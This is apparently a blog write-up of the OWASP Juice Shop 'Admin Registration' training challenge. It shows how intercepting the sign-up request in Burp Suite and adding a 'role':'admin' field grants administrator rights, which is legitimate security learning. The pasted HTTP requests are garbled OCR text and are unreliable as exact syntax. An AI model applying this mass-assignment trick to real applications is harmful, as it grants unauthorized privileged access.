Challenge:
Name: Admin Registration
Description: Register as a user with administrator privileges.
Difficulty: 3 star
Category: Improper Input Validation
Expanded Description: https://pwning.owasp-juice.shop/part2/improper-input-validation.html
Tools used:
Burp, FoxyProxy
Resources used:
Methodology:
In the expanded description, it’s recommended that I try registering as an ordinary user to see what API endpoints are involved, then to “Think of the simplest possible implementations of a distinction between regular users and administrators”.
After setting up Burp Suite and FoxyProxy, then filling in the new user registration form, this is the packet that is sent to the server.
![Dashboard Target
Intruder Repeater
Sequencer
HIT P history WebSockets history Options
Request to http://localhost:3000
[12700
1]
Param s Headers
Raw Actions
1 POST ,'api/Users/ HTTP/I.I
Host: local host 3000
User-Agent: MoziIIa/S.O (X
11; Linux x86 64;
application/ j son, text/ plain, * / *
4 Accept
S Accept -Language: en-US,
Accept -Encoding: gzip, deflate
7 Content -Type: application/ j son
Content -Length: 273
Origin: http://localhost : 3000
10 Connection: close
Referer: http•
// I Ocal host 3000/
rv.78.o)
Decoder
Gecko,'201001
12 Cookle: language=en; welcomebanner status=dismiss;
14 {
email " "test3@test . com' ,
password
" "test 1234" ,
passwordRepeat
" "test 1234" ,
securityQuestion"
cookieconsent
"icl" : I
question
createdAt'
'updatedAt'
'Your eldest siblings middle name?' ,
2020-11- 02T17: 22: 49. 988Z" ,
2020-11- 02T17: 22: 49 988Z"
securityAnswer" "Ferdinand Cunningham ill"](https://curiositykillscolby.files.wordpress.com/2020/11/image-63.jpeg?w=488)
Fortunately, thanks to the user authentication details I gathered during the Admin Section challenge, I have a JSON document containing all of the database fields this form can populate.
Looking at the differences between the admin account and Jim’s account, it’s plain to see that the “role” field is the simplest way to differentiate between customer accounts and administrator accounts, so adding a “role” field to the outgoing registration packet identifying this user as an administrator may be sufficient to complete this challenge.
![Dashboard Target
Intruder Repeater
Sequencer
HIT P history WebSockets history Options
Request to http://localhost:3000
[127 001]
Para ms Headers
Pretty
Raw Actions
POST /api/Users/ HI-rp/l.l
Host: local host 3000
User-Agent: MoziIIa/S.O (X
11; Linux x86 64;
application/ j son, text/ plain,
Accept
Accept -Language: en-lJS, en; q=O.S
Accept -Encoding: gzip, deflate
Content -Type: application/ j son
Content -Length: 273
Origin: http://localhost : 3000
Connection: close
Referer: http://localhost : 3000/
rv.78.o)
12
14
Cookie: language=en; welcomebanner status=dismiss;
email " "test3@test . com' ,
password
" "test 1234" ,
passwordRepeat
" "test 1234" ,
'role
'admin",
securityQuestion"
"icl" : I
question
createdAt'
'updatedAt'
'Your eldest siblings middle name?' ,
2020-11- 02T17: 22: 49. 988Z" ,
2020-11- 02T17: 22: 49 988Z"
securityAnswer" "Ferdinand Cunningham Ill"](https://curiositykillscolby.files.wordpress.com/2020/11/image-61.jpeg?w=402)
Prevention and mitigation strategies:
Lessons Learned and Things Worth Mentioning:
- This is a perfect example of using previously gathered information to help craft an entirely new attack. Having the user authentication details saved from the Admin Section challenge made completing this challenge far faster and simpler. This is why I always take time in challenges to gather any extra data I come across and save it in a specific directory for future reference. You never know when stuff will come in handy.
Curiosity Kills Colby 